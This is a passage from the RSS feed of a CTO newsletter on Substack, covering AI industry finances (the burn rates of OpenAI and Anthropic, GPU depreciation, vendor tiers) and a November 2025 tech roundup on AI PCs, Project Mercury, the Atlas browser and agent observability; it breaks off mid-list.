guys pretend they understand finance and finance guys pretend they understand tech: spectacular self-owns where a CEO inadvertently reprices his entire capex plan.</p><p>Anthropic and OpenAI represent two ideological responses to the same tier economics, and their divergence reveals which parts of the value chain each believes will capture sustainable margin. In 2025, both ran roughly 70% burn ratios: OpenAI at $13 billion revenue with $9 billion in net operating losses, Anthropic at $4.2 billion revenue with $3 billion in net losses. By 2028, Anthropic&#8217;s base case projects breakeven. OpenAI&#8217;s base case shows a $74 billion net loss. <em>Faites vos jeux.</em></p><p>Anthropic is betting on unit economics and composable profitability: monetize the present, then scale it. (My kind of company, obvi.) They&#8217;re running an 80% enterprise customer mix, pruning expensive modalities like video generation, optimizing for high annual contract values with predictable renewal rates. It&#8217;s a SaaS playbook, build a defensible Tier 4 position, expand from there, and <em>never spend more than you can explain to a CFO without a deck.</em> <strong>Capital efficiency buys strategic flexibility</strong>: the freedom to raise less, spend more, or survive a capital winter. Or BTC $50,000. </p><p>OpenAI is betting on narrative convexity and pre-emptive scale: build the future, then monetize it. Their burn is a portfolio of call options on video (Sora), consumer products (ChatGPT), browsing infrastructure (Atlas), agents, robotics, and multi-year compute commitments. The logic is ok if you really squint: secure Tier 3 capacity now, build Tier 5 product optionality across modalities, and scale into whichever surfaces show traction. Standard VC Vegas style approach. If it works, you own tiers 3 through 5. If it doesn&#8217;t, you&#8217;re holding stranded capital in the form of unused cloud credits and hardware commitments you can&#8217;t unwind. OpenAI is selling the promise of a future where they control the energy grid and possibly your therapist. Anthropic is selling predictability. Both are ostensibly rational. Only one can be right at current burn rates.</p><h2><strong>Industry Impact</strong></h2><blockquote><p>The &#8220;Magnificent 7&#8221; plus 34 data-center ecosystem companies account for 75% of S&amp;P 500 returns since October 2022, 80% of earnings growth, and 90% of capital spending growth.</p></blockquote><p><strong>Power has already shifted from Tier 4 (models) to Tier 3 (cloud infrastructure)</strong> and is consolidating back toward Tier 1 (silicon fabrication). Google released Gemini 3 (November 18) with genuine reasoning improvements but at 8x to 16x the cost of GPT-5.1 Thinking on input and 6x to 9x on output. Within days, Anthropic shipped Opus 4.5. Qwen matched frontier performance with 3 billion active parameters, small enough to run on a single H100. \o/ Model quality <em>is</em> converging. The differentiation is collapsing at Tier 4, which means margin capture is moving to whoever controls Tier 3 (compute access and cloud commitments) and Tier 5 (enterprise distribution and application value.)</p><p>Google could collapse Tier 2 margins tomorrow by making TPUs commercially available at scale and reasonable pricing. Nvidia&#8217;s dominance would end, compute would become a commodity, and the entire capex buildout predicated on GPU scarcity would turn into stranded assets. This hasn&#8217;t happened because Google benefits from Nvidia&#8217;s pricing power, it limits how fast competitors can scale. But the threat is structural, and it means every multi-year compute commitment is a bet on market structure as much as technical capability.</p><p>The lasting value might not be the models or even the GPUs but in the industrial capability itself. The dot-com bubble left us fiber in the ground that enabled the internet economy. (Though its undersea siblings are somewhat at risk.) Crypto mining built Crusoe, which is now constructing Stargate for OpenAI on stranded natural gas infrastructure in Abilene. If AI is a bubble, what survives is Tier 1 and the power infrastructure: the fabrication plants, the supply chains, the buildings that can deploy massive compute on demand. The GPUs are worthless after three years, but  datacenters are forever (well, decades, anyway.) </p><h2><strong>What This Means for CTOs</strong></h2><p><strong>Your infrastructure decisions are bets on which tier thrives</strong> when capital markets turn hostile. The reveal everyone else is missing: the model is becoming the feature, and the infrastructure around it is becoming the business. Tier 4 differentiation is collapsing. The moat is moving to Tier 3 (who controls compute access) and Tier 5 (who converts intelligence into business value). OpenAI&#8217;s business plan is based on the reverse premise, tho (in fact they can&#8217;t survive <em>unless</em> Tier 5 collapses into Tier 4.) You need to architect for scenarios where your primary vendor&#8217;s Tier 4 position evaporates, their Tier 3 commitments become stranded capital, or their cash conversion problems force sudden repricing.</p><p>Capex versus opex is the immediate decision point. If you treat AI infrastructure as capex, you&#8217;re locked in when technology shifts; stuck depreciating assets that are economically obsolete in 18 months. If you treat it as opex, tho, your CFO sees spiraling costs with no asset value. The right answer depends on which replacement cycle assumptions pan out. If model improvement continues at current pace, treat it as opex and preserve flexibility. If it plateaus, capex gives you predictable costs. Most CTOs are optimizing for this quarter&#8217;s budget conversation instead of next year&#8217;s architectural constraints. Don&#8217;t be one of them. </p><p>Multi-vendor strategies are mandatory. Anthropic&#8217;s capital efficiency means they&#8217;ll survive if funding windows close. OpenAI&#8217;s compute commitments mean they&#8217;ll have capacity if demand materializes. Your job isn&#8217;t picking the winner, it&#8217;s avoiding an all-in bet on either future. (Unless you&#8217;re company is <em>exceptionally </em>un-risk-adverse.) Abstract model selection behind orchestration layers, maintain fallback paths, and stress-test dependencies for scenarios where your primary vendor&#8217;s pricing power collapses or credit lines get pulled.</p><p>The second-order risk is Tier 3 collateral damage. If OpenAI or Anthropic stumbles, Microsoft and Amazon absorb it. If Nvidia&#8217;s inventory becomes writedowns, it cascades through every tier. Your SaaS vendors on Azure OpenAI or AWS Bedrock might face sudden price increases, service degradations, or forced migrations as underlying providers reprice risk. You can&#8217;t predict which tier fails first, but you can architect flexibility to survive any of them failing.</p><p>You&#8217;re not building on models. You&#8217;re building on a tier structure where economic value is trapped three layers below the API you&#8217;re calling, and the tiers above it are playing hot potato with credit lines. The round-tripping will continue until morale improves.</p><h2>CTO Playbook: 30/60/90 </h2><h4>Capital Risk Hedge</h4><h5><strong>OKR: Structure your AI infrastructure strategy as a financial portfolio designed to hedge against depreciation fiction, vendor lock-in, and Tier 4 commoditization.</strong> </h5><h5><strong>30 Days: Auditing and Cash Flow Resilience</strong><br><em>Uncovering financial exposure stemming from GPU depreciation and vendor-subsidized debt.</em></h5><ul><li><p><strong>Recalculate Economic Obsolescence (CRITICAL)</strong></p><ul><li><p><strong>Action:</strong> Re-evaluate your current AI infrastructure (GPUs, specialized hardware) using an <strong>18-month economic life cycle</strong> instead of the standard 60-month depreciation schedule. Calculate the difference between the <strong>book value</strong> and the <strong>actual replacement value</strong>.</p></li><li><p><strong>Goal:</strong> Present the CFO with the true, accelerated <strong>depreciation liability</strong> to force a conversation about treating AI infrastructure as <strong>OPEX</strong>, not CAPEX.</p></li></ul></li><li><p><strong>Audit Vendor Subsidies (HIGH)</strong></p><ul><li><p><strong>Action:</strong> Analyze all cloud credits and multi-year compute commitments received from Tier 3/4 vendors (Microsoft, Google, Anthropic). Determine the <strong>cash cost</strong> if those vendors pulled their investment/subsidy lines or repriced their services overnight.</p></li><li><p><strong>Goal:</strong> Identify where your application&#8217;s current <em>unit economics</em> are being falsely subsidized by the vendors&#8217; <strong>round-tripping</strong> capital, which creates the highest operational risk.</p></li></ul></li><li><p><strong>Abstract Model Selection (HIGH)</strong></p><ul><li><p><strong>Action:</strong> Mandate that all new AI applications and workflows be abstracted behind a standard orchestration layer (e.g., LangChain, custom service). <strong>Ban hard-coded API dependencies</strong> on a single Tier 4 model (e.g., GPT-5.1 Thinking).</p></li><li><p><strong>Goal:</strong> Hedge against Tier 4 commoditization. Ensure the business can rapidly switch models when a better, cheaper alternative (like Qwen, or a new Anthropic release) emerges, preserving model choice and negotiating leverage.</p></li></ul></li></ul><h5><strong>&#9633; 60 day: Tier-Agnostic Architecture &amp; Flexibility</strong><br><em>Architectural bets prioritizing portability &amp; resilience against specific Tier collapse (2, 3, or 4).</em></h5><ul><li><p><strong>Build a Compute Arbitrage Strategy (MEDIUM HIGH):</strong></p><ul><li><p><strong>Action:</strong> Begin piloting non-hyperscaler compute options (e.g., Oracle, specialized GPU cloud providers, bare metal) for non-critical workloads.</p></li><li><p><strong>Goal:</strong> Develop an internal capability to <strong>arbitrage GPU scarcity and pricing</strong> outside of the primary Tier 3 vendors (Microsoft/Amazon), hedging against a structural collapse of Nvidia&#8217;s pricing power.</p></li></ul></li><li><p><strong>Define a Multi-Vendor Model Strategy (MEDIUM)</strong></p><ul><li><p><strong>Action:</strong> Formally designate fallback models for critical business functions. For every Tier 4 model used, identify a <strong>Tier-4 competitor</strong> and an <strong>Open Source/Fine-Tuned model</strong> as a viable contingency path.</p></li><li><p><strong>Goal:</strong> Avoid an all-in bet on either the <strong>OpenAI (Scale)</strong> or <strong>Anthropic (Efficiency)</strong> ideological future, ensuring survival regardless of who wins the capital race.</p></li></ul></li><li><p><strong>Inventory Stranded Assets (MEDIUM)</strong></p><ul><li><p><strong>Action:</strong> Document all current and future multi-year cloud commitments and hardware leases. Calculate the <strong>stranded capital liability</strong> if model improvement stops or Tier 4 differentiation completely evaporates in the next 12 months.</p></li><li><p><strong>Goal:</strong> Prepare for the possibility of a large write-down and maintain the flexibility to avoid new long-term commitments.</p></li></ul></li></ul><h5><strong>&#9633; 90 Days: Structural Investment &amp; Value Capture</strong><br><em>Long-term investment in the stable layers of the value chain: Tier 1 (Capability) &amp; Tier 5 (Apps)</em></h5><ul><li><p><strong>Invest in Tier 5 Value Capture (HIGH STRATEGY)</strong></p><ul><li><p><strong>Action:</strong> Shift development resources away from optimizing model calls (Tier 4) toward <strong>integrating AI into proprietary workflows and distribution channels</strong> (Tier 5).</p></li><li><p><strong>Goal:</strong> Ensure your applications capture the final, sustainable margin in the value chain, making your business resilient regardless of which model vendor survives.</p></li></ul></li><li><p><strong>Initiate Industrial Capability Planning (MEDIUM STRATEGY)</strong></p><ul><li><p><strong>Action:</strong> Begin preliminary analysis on the long-term utility of physical infrastructure (datacenter leases, power infrastructure, cooling). Analyze these assets as <strong>deca-long</strong> investments rather than three-year compute investments.</p></li><li><p><strong>Goal:</strong> Align your spending with the <strong>lasting value</strong> identified in the section&#8212;the industrial capability itself&#8212;not the transient value of the GPU or the model.</p></li></ul></li><li><p><strong>Hedge the Crypto-AI Cascade (LOW STRATEGY)</strong></p><ul><li><p><strong>Action:</strong> If your business has exposure to crypto (either through payments, treasury, or investment), run a stress test simulating a <strong>40% drop in Nvidia stock</strong> (triggering loan defaults) followed by a <strong>50% crash in Bitcoin</strong> (the cascade risk).</p></li><li><p><strong>Goal:</strong> Be prepared for the systemic, narrative shock where AI infrastructure bets and crypto leverage collapse together, disrupting capital markets and investment windows.</p></li></ul></li></ul><h2>The Bottom Line</h2><p><strong>Your infrastructure stack is not a technology decision</strong>; it is a financial arbitrage bet against market reality. You are wagering that the GPU you buy today, which will be economically obsolete in 18 months, will generate enough Tier 5 revenue before its replacement is required. This calculation fails every stress test. The value is not in the models you call or the GPUs you buy. It is trapped in Tier 1 (fabrication) and the industrial capability itself.</p><p>The final reveal is that the structural mismatch, where infrastructure is treated as CAPEX on paper but demands OPEX flexibility operationally, guarantees a massive, systemic writedown when depreciation schedules collide with replacement reality. You cannot build a multi-year business on a system predicated on accounting fiction.</p><p>Your job is not to pick the winner between OpenAI and Anthropic, but to survive the inevitable capital correction. Treat AI infrastructure as OPEX to preserve the flexibility to swap hardware on an 18-month cycle. Shift resources from Tier 4 (model tinkering) to Tier 5 (proprietary application value), which is the only place margin is captured sustainably. The entire ecosystem is operating on a high-leverage credit line called &#8220;narrative convexity.&#8221; The moment the music stops, you need to ensure your Tier 5 applications are generating enough real economic value to pay the bills for the infrastructure Tier 3 subsidized. If you haven&#8217;t captured Tier 5, you&#8217;re just another creditor in the collapse.</p><p>The round-tripping will not stop until morale improves, or until the market finally sends the writedown large enough to force reality onto the balance sheets. </p><div><hr></div><p><em>To attend CTO Lunches, please register at <a href="http://ctolunches.com/">ctolunches.com</a> and choose NYC as your city.</em></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Subscribe for free to receive monthly updates from CTO Lunch NYC.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p></p>]]></content:encoded></item><item><title><![CDATA[CTO Lunch NYC November 2025]]></title><description><![CDATA[Tech Roundup for CTOs: October &#8594; November by Forest Mars]]></description><link>https://ctolunchnyc.substack.com/p/cto-lunch-november-2025</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/cto-lunch-november-2025</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Wed, 05 Nov 2025 20:20:44 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/c5399c49-0778-4de6-8e93-a7d98c23ea11_1248x832.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>October brought us the Internet&#8217;s greatest achievement and its most catastrophic </strong>infrastructure incident in the same breath. Archive.org just crossed the one trillion page mark, a feat of digital preservation so vast it&#8217;s like cataloging every grain of sand on a beach that nobody asked you to count. Or most likely, will ever be looked at by another human being again. Days later, an <a href="/__u/ctolunchnyc.substack.com/p/dont-lose-sleep-over-it">AWS control-plane outage</a> took out over 3,500 companies, from fintechs to federal contractors, to well known brands, proving once again that our world now runs on a single distributed dependency graph. We&#8217;ve built systems capable of cataloging humanity&#8217;s digital history but incapable of failing gracefully when someone makes a typo. </p><blockquote><p>It&#8217;s a perfect juxtaposition: at the very moment we celebrate our ability <br>to save everything, we also prove we can&#8217;t keep it all running.</p></blockquote><p>A trillion pages doesn&#8217;t even include Archive&#8217;s book collection (smaller now after this year&#8217;s copyright ruling), but the irony holds either way. We&#8217;ve reached peak data abundance and yet find ourselves scraping the bottom of the internet&#8217;s barrel for more. Foundation models have eaten nearly all public text, and the world is starting to look like a starving AI engineer stumbling home at 3am to find DoorDash done, the fridge empty, and the training run still demanding more data. (Why can&#8217;t <a href="/__u/www.google.com/maps/search/mel&#39;s+drive+in+san+francisco+locations/@37.7903543,-122.4503596,14z/data=!3m1!4b1!5m1!1e1?entry=ttu&amp;g_ep=EgoyMDI1MTEwMi4wIKXMDSoASAFQAw%3D%3D">Mel&#8217;s</a> be open until 3:00 every night? But even NYC isn&#8217;t 24/7 anymore.) Early architecture promised it just needed more data, more GPUs, more data centers, never mind the water; we&#8217;re manufacturing each of them fast as humanly possible, but the big question remains: what happens when models &#8216;finish&#8217; training and start taking action?</p><div class="pullquote"><p><a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-november-2025"> IN THIS ISSUE</a><br><a href="/__u/ctolunchnyc.substack.com/i/178040240/project-mercury-launch-escape-velocity">Escape Velocity</a><br><a href="/__u/ctolunchnyc.substack.com/i/178040240/atlas-shrugged">Atlas Shrugged</a><br><a href="/__u/ctolunchnyc.substack.com/i/178040240/secret-agent-man">Secret Agent Man</a><br><a href="/__u/ctolunchnyc.substack.com/i/178040240/python-sheds-its-skin">Python Sheds its Skin</a><br><a href="/__u/ctolunchnyc.substack.com/i/178040240/rip-the-modern-data-stack">RIP Modern Data Stack</a><br><a href="/__u/ctolunchnyc.substack.com/i/178040240/risk-security-and-compliance">RSC-y Business</a></p></div><h2>The AI Rloveution </h2><p><em>What comes after prediction: when models begin to decide and take action?</em></p><p>If Microsoft&#8217;s big &#8216;reveal&#8217; this month seemed obvious, that every Windows 11 machine is becoming an AI PC (with voice-chatting Copilot, screen-sharing, and permissioned task execution) and users will no doubt welcome the convenience, what this really is, is infrastructure for delegation: the extended substrate our apps will run on. Windows isn&#8217;t just adding AI features; it&#8217;s becoming an agentic operating system where the UI is increasingly a suggestion layer between the user and autonomous execution. How are you building your apps for this coming age of intent delegation infrastructure? <br>(Hint: make sure they are machine-discoverable, well-permissioned, &amp; context-aware.)</p><p>Apple, not surprisingly, is taking an &#8216;opposite&#8217; approach. While Microsoft bets on cloud-connected AI everywhere, Apple&#8217;s M5 Neural Engine (ANE) represents a different thesis: on-device, post-foundational, <strong>AI </strong><em><strong>as</strong></em><strong> UX</strong>,  reframing the question from <em>how big can you go</em> to <em>how close can you get</em>? And M5&#8217;s ANE improvements are genuinely impressive: more cores, better power efficiency, dramatic throughput gains that <em>should</em> enable on-device AI capabilities, making cloud inference look quaint. We live in hope. </p><p>Except there&#8217;s a problem: Apple&#8217;s hardware teams are lapping their software teams, and it&#8217;s unclear if this is by design or dysfunction. The ANE still doesn&#8217;t have a native programming model. If you want to use it directly, you&#8217;re routing through CoreML, wrapping models in Apple&#8217;s proprietary format and hoping the compiler makes sensible optimization decisions. MLX, the closest thing to a modern deep learning framework for Apple Silicon, doesn&#8217;t even use the neural engine. ANE Transformers exist as a library, Apple&#8217;s Foundation models leverage ANE, but if you&#8217;re doing custom model work you&#8217;re navigating undocumented APIs and hoping you don&#8217;t fall off performance cliffs. (Or real ones. Speedy recovery, Kevin!) </p><p>While  Apple treats ANE programming like a state secret, <a href="https://www.nvidia.com/en-us/research/">NVIDIA</a> is publishing  CUDA docs like they&#8217;re running a university press. The result is bizarre: Apple&#8217;s own apps get blazing-fast on-device inference while third-party developers either hit the cloud or accept 10&#215; slower performance using CPU/GPU instead of ANE. (IOW, their usual tricks.) M5 has all the nuts and bolts but isn&#8217;t exactly pr&#234;t-&#224;-porter for developers who want to ship production AI features. (M6 is <em>supposed</em> to fix this.) </p><p>Gruber once said: &#8220;All things considered I&#8217;d much prefer a PC running Mac OS X to a Mac running Windows.&#8221; Fifteen years later, we&#8217;re in the mirror world: the hardware is spectacular, the software story is a mess, and developers are left wondering if Apple can actually succor a third-party AI ecosystem or just wants it all to themselves. </p><h3>OpenAI Season</h3><p>Restructuring into a $500B public benefit corporation was just the opening act. Microsoft walked away with a 27% stake ($135B), $250B in guaranteed Azure revenue, and rights to OpenAI&#8217;s IP until AGI or 2030; the kind of circular round&#8209;tripping that makes accountants twitch. Within a week of Microsoft&#8217;s right-of-first-refusal expiring, OpenAI had announced a $38B, seven-year cloud deal with AWS, asserting leverage before anyone could react. Meanwhile $2.5B in stock comp flowed to ~3,000 employees (a jaw-dropping~$830K per person in six months), prompting one CTO to note that OpenAI is effectively &#8220;a hedge fund that trains neural networks.&#8221; </p><p>Lawrence Lessig&#8217;s <a href="https://gwern.net/doc/reinforcement-learning/openai/2025-lessig-cand433688-152-amicicuriae.pdf">amicus brief</a> on behalf of 12 ex-employees raises uncomfortable questions about sustainability, but this act isn&#8217;t going to be about the corporate drama. It&#8217;s about what OpenAI is launching while everyone watches that soap opera.</p><h3>Project Mercury: Launch != Escape Velocity</h3><p><strong>Project Mercury is OpenAI&#8217;s play for Wall Street, and it&#8217;s smarter than</strong> generally acknowledged<strong>.</strong> They&#8217;re hiring contractors at $150/hr to train AI on investment banking workflows: IPO modeling, M&amp;A comps, deck reformatting, the grunt work that defines junior analyst life. The insight is simple: whoever wins financial services AI wins enterprise AI. Banks spend hundreds of millions annually on work that&#8217;s structurally formulaic. 50% automation = easily $100M annual savings for a large bank, but the real prize is talent arbitrage: senior bankers freed from deck hell can do higher-value work.</p><p>The competitive landscape is dotted with the usual suspects. Bloomberg&#8217;s AI Terminal leverages decades of proprietary financial data and existing trader workflows; their moat is data access and terminal lock-in. Palantir Foundry already owns complex data integration at major banks; they can add AI features to existing deployments without ripping and replacing infrastructure. Google and Microsoft are pushing Vertex AI and Azure OpenAI respectively, bundling AI capabilities with cloud contracts banks already have.</p><p>Here&#8217;s where it gets messy for OpenAI: Microsoft&#8217;s Azure OpenAI <em>is</em> OpenAI&#8217;s models, which means Microsoft is simultaneously OpenAI&#8217;s distribution partner and their direct competitor. Banks already paying for Azure can add OpenAI capabilities without a new vendor relationship, they just route through Microsoft. But this is precisely why Project Mercury matters strategically. The $250B Azure revenue guarantee gives OpenAI distribution, but it also creates existential risk: what happens when Microsoft launches &#8220;Copilot for Investment Banking&#8221; using the same underlying models? Project Mercury is OpenAI&#8217;s answer: build such deep domain expertise in financial workflows, through intensive contractor training, proprietary deal data, and operational refinements, that Microsoft can&#8217;t simply replicate it by fine-tuning base models.</p><p>Every month Project Mercury trains on real investment banking workflows is another month of domain knowledge that doesn&#8217;t exist in the base GPT-5 model Microsoft has access to. The goal is to achieve escape velocity: make OpenAI&#8217;s banking AI so specialized, (and so operationally refined) that Microsoft would need 18+ months and hundreds of millions to catch up, by which time OpenAI has already captured the enterprise accounts and reached a stable orbit beyond Redmond&#8217;s gravitational pull. It&#8217;s a brilliant hedge: use Microsoft&#8217;s distribution to win customers, but build proprietary domain expertise they can&#8217;t easily replicate. The $250B Azure guarantee keeps Microsoft happy in the short term. Project Mercury success ensures OpenAI doesn&#8217;t need Microsoft in the long term.</p><p>Then there&#8217;s <a href="http://farsight-ai.com">Farsight AI</a>, a recent Series A company operating in a different but intersecting orbit. They&#8217;re already shipping, automating investment banking deliverables (decks, CIMs, DCF modeling) targeting the same massive cost savings OpenAI is chasing. But while OpenAI is building domain expertise (training models on real banking workflows to understand deal structure, comps logic, output quality), Farsight is building production systems (solving how to reliably generate complex financial documents at scale under deadline pressure.) While OpenAI is still hiring contractors to build training data, Farsight is already live with customers. The challenges aren&#8217;t about model capabilities; they&#8217;re about operational reliability; not considered as sexy a problem, but the very real difference between a demo and a product. With a catch more like a law of conservation than Jevons Paradox: If the system requires even a small amount of high-cost senior banker time to QA, it can easily erase the savings gained by automating many hours of low-cost junior banker time, and the ROI collapses. The unsexy truth: production AI for financial services is 20% model quality and 80% operational reliability. And 0% trust. </p><p>For Farsight, the strategic window is clear; they&#8217;re already solving operational challenges, already have customer relationships, already iterating on real feedback. While OpenAI navigates the complexity of contractor training and Microsoft partnership dynamics, they can capture market share by simply reaching operational altitude first. But this is hare vs. hare, not tortoise vs. hare. OpenAI would seem to have better resources, better models, better brand. If they execute reasonably well, they can win. Farsight&#8217;s advantage is execution speed and customer proximity: <br>if they can lock in relationships while OpenAI is still navigating contractor training, Microsoft politics, and figuring out what banks actually need, that&#8217;s a real window.</p><p>The winner in financial services AI won&#8217;t necessarily be the company with the best foundational model; it&#8217;ll be whoever achieves sustainable orbit first: trust, integration, and operational reliability that works at scale.</p><p>CTOs should watch this closely, not just to see who wins, but to understand the playbook. This is your preview of how 2026 enterprise AI budgets get allocated: not to the best technology, but to whoever achieves escape velocity on execution and trust fast enough to matter. The question isn&#8217;t about benchmarks or launch announcements let alone who has the biggest or most recent model; it&#8217;s about sustained flight in the operational trenches where production AI actually happens.</p><h3>Atlas Shrugged</h3><p>ChatGPT Atlas went GA for macOS (on 10/21) with Android pending. On the surface, it looks like yet another Chromium fork joining Comet and Dia in the AI browser waiting room. Except OpenAI isn&#8217;t building a better browser. They&#8217;re building distribution control before the model layer commoditizes entirely. (The Interzone, so to speak between tier 4 and tier 5.) </p><p>The browser question isn&#8217;t &#8220;why does OpenAI need one?&#8221; It&#8217;s &#8220;what happens when the browser disappears entirely?&#8221; Elon recently prognosticated that future devices will become pure delivery mechanisms for custom AI-generated (video) content.  Instant, personalized, generated on-demand. If he&#8217;s right, the browser as we know it, tabs, bookmarks, URLs, becomes vestigial. What replaces it is something closer to a *viewport*: a window where AI assembles information, media, and interaction surfaces dynamically, on the fly, tailored to your personal context.</p><blockquote><p>Whoever controls that viewport controls distribution. </p></blockquote><p>OpenAI isn&#8217;t competing with Chrome on features. They&#8217;re positioning for a world where the browser is the last middleware layer between users and AI-generated reality. Whoever controls that viewport controls distribution. Whoever controls distribution decides which models get used, which data gets accessed, which experiences get prioritized.</p><p>Think about what&#8217;s already changing: you don&#8217;t browse Reddit anymore, you ask ChatGPT to summarize it. You don&#8217;t search for restaurants, you ask Claude to plan dinner. The browser as a *place you go* is being replaced by the browser as a *thing that assembles answers.* Atlas is OpenAI&#8217;s bet that when the web becomes something AI reads *for* you instead of *to* you, you want to own the viewport doing the reading.</p><p>Arc tried to reimagine browsing and failed (though they had a <a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-september-2025#:~:text=Brooklyn%20startup%20The%20Browser%20Company%20for%20a%20reported%20%24610%20million%20in%20a%20cash%20only%20deal">successful exit</a>) because they built a product for a market that didn&#8217;t exist yet. Dia hasn&#8217;t even launched. Atlas might succeed not because it&#8217;s &#8220;better&#8221; per se, but because it&#8217;s infrastructure for the agentic web, not a feature-packed browser for humans who still think in tabs.</p><h3>Secret Agent Man</h3><p><strong>40% of agentic AI projects will fail by the end of 2027. </strong>[Gartner] That doesn&#8217;t mean agentic is over; quite the opposite really: Karpathy went so far as to say the coming 10 years will be the agentic decade and explicitly *not* the decade of AGI&#8217;s imminent arrival. Whelp, I guess that gives me a lot longer to finish my book.</p><p>For the past two years, enterprises treated agent pilots as sandboxes: promising but unproven. Now, it&#8217;s time these pilot graduate to production, and CFOs are asking the tough questions: &#8220;What is the measurable ROI?&#8221; and &#8220;Why does this cost more than three FT developers?&#8221; The projects that fail aren&#8217;t the ones that don&#8217;t work, but the ones that can&#8217;t articulate their value in a way that survives budget review.</p><p>It&#8217;s a familiar pattern. Remember when every company needed a blockchain strategy? The tech worked fine(ish). The projects got canceled because no one could explain why a database with extra steps was worth the architectural complexity. Agentic AI is about to hit the same filter, and the survivors will be the ones that can draw a straight line from &#8220;AI agent deployed&#8221; to &#8220;measurable business outcome achieved.&#8221;</p><blockquote><p> Organizations that understand the difference between dataflow and runtime are the ones shipping more successful agents.</p></blockquote><p>While everyone argues about AGI timelines, the real, foundational battle is happening at the infrastructure layer. The emerging pattern is clear: organizations that understand the difference between dataflow and runtime are the ones shipping more successful agents. Those that don&#8217;t are six months into &#8220;building our agentic platform,&#8221; only to discover their architecture cannot actually support the production use cases they promised their leadership. </p><p>Anthropic&#8217;s recent (10/16) <a href="https://www.anthropic.com/engineering/equipping-agents-for-the-real-world-with-agent-skills">Agent Skills</a> framework provides a concrete example of runtime thinking in action. Rather than treating agent context as an undifferentiated blob, Skills uses progressive disclosure: agents load only the context they need, when they need it, creating an inherent audit trail. Each skill directory becomes a versioned, reproducible unit of agent behavior: you can reconstruct exactly which context was loaded and when. Skills separate stochastic reasoning (the SKILL.md instructions) from deterministic execution (bundled Python scripts), giving you the reliability production systems demand. And because skills are portable across Claude.ai, Claude Code, and the API, they thread the needle between &#8216;lightweight framework&#8217; and &#8216;full-stack runtime&#8217; (opinionated about structure without locking you into a single platform.) Most importantly, skills codify iterative learning: when an agent fails, you capture what went wrong directly into the skill&#8217;s context, preventing yesterday&#8217;s failures from recurring tomorrow. It&#8217;s exactly the kind of architecture that survives budget review because you can point to the SKILL.md file and say &#8216;here&#8217;s what it did and why.&#8217;</p><p>The infrastructure choices reveal a market split: established enterprises with existing orchestration platforms tend to embed lightweight frameworks like LangChain into their current workflows, while agent-first startups building products where the agent is the core increasingly reach for full-stack platforms (Mastra) providing a dedicated runtime environment, offering the stability and control a complex agent system requires: reproducible decision paths, traceable reasoning, and policy enforcement baked into the execution layer; not just seeing what the agent did, but reconstructing <em>why</em> it did that, and proving it to auditors, stakeholders, or your most suspicious CFO. <br>The choice tells you almost everything about whether a company is shipping an experimental feature or a scalable, production-ready product. And the tension (framework vs runtime) feels like a classic library-vs-framework tug-of-war, scaled out to autonomous systems. </p><h4>Industry Impact</h4><p>Here&#8217;s where <strong>Observability 2.0</strong> comes in. Traditional observability (logs, dashboards, simple monitoring) was built for predictable pipelines (not to mention the ETL era.) It tells you <em>what happened</em>, sometimes <em>when</em>, rarely <em>why</em>. Agentic AI, however, is autonomous, stochastic, and constantly adapting. Execution debt isn&#8217;t about broken code; it&#8217;s about trust. Can you explain why the agent acted as it did? Can you reproduce success across contexts? Can you prevent yesterday&#8217;s failure from recurring tomorrow?</p><blockquote><p><strong>Execution debt isn&#8217;t about broken code; it&#8217;s about trust.</strong></p></blockquote><p>The agentic era introduces a new kind of technical debt: execution debt. Traditional debt is about messy code; execution debt is about trust. When your agent acts, can you explain why? When it fails, can you prevent it next time? When it works, can you reproduce the reasoning that led there? Companies treating agents as &#8220;better APIs&#8221; are accruing execution debt fast. The refactor bill comes due when:</p><ul><li><p>Your agent hallucinates in production and deletes customer data</p></li><li><p>Compliance asks for an audit trail, and you don&#8217;t have one</p></li><li><p>The agent&#8217;s reasoning shifts and no one knows why</p></li><li><p>You upgrade models but can&#8217;t prove behavior stays consistent</p></li></ul><p>The survivors will build observability into the stack from day one. Not logging. Not monitoring. <em>(Modern) Observability.</em> aka O11y 2.0. The ability to reconstruct an agent&#8217;s reasoning, trace decisions to data &amp; prove it stayed within policy. Because when your secret agent man says he sees everything, he&#8217;d better have the dashboard to prove it.</p><h3>CTO Playbook: 30/60/90</h3><ul><li><p><strong>Implement Agent Observability* Stack: (HIGH PRIORITY - 30 days)<br></strong> Deploy structured logging for all agent actions with: (1) decision trace (inputs, reasoning chain, outputs), (2) action audit trail (what was executed, when, by which agent, under what permissions), (3) rollback metadata (pre-action state snapshots). Minimum: OpenTelemetry tracing with agent-specific spans, persistent storage for 90 days, dashboard showing agent decision paths. <strong>Deliverable</strong>: Working observability dashboard showing last 1000 agent actions with full trace reconstruction.<br><strong>*</strong>(<em>Observability here meaning Modern Observability aka O11y 2.0</em>) </p></li><li><p><strong>Document Agent ROI by Use Case: (HIGH PRIORITY - 30 days)<br></strong> Create spreadsheet mapping each agentic project to measurable outcomes: hours saved per week, cost per hour, annual savings, implementation cost, payback period. Require project leads to fill this out for every agent pilot. <strong>Deliverable</strong>: One-page ROI summary per agent showing break-even timeline and monthly cost/benefit. Template: &#8220;Agent X saves Y hours/week at $Z/hour = $ABC annual savings vs $DEF implementation cost = F-month payback.&#8221;</p></li><li><p><strong>Architecture Decision Record: Pipeline vs Runtime: (HIGH PRIORITY - 30 days)<br></strong> For every agentic use case in development, document the architectural decision: stateless pipeline (orchestrated by external scheduler, no persistent state) or stateful runtime (long-lived process, maintains context). Reject any proposal that tries to do both. <strong>Deliverable</strong>: ADR template with decision criteria, one completed ADR per active agent project, sign-off from technical lead.</p></li><li><p><strong>Implement Agent Circuit Breakers: (HIGH PRIORITY - 30 days)<br></strong> Add safety controls to all production agents: (1) action approval thresholds (auto-execute 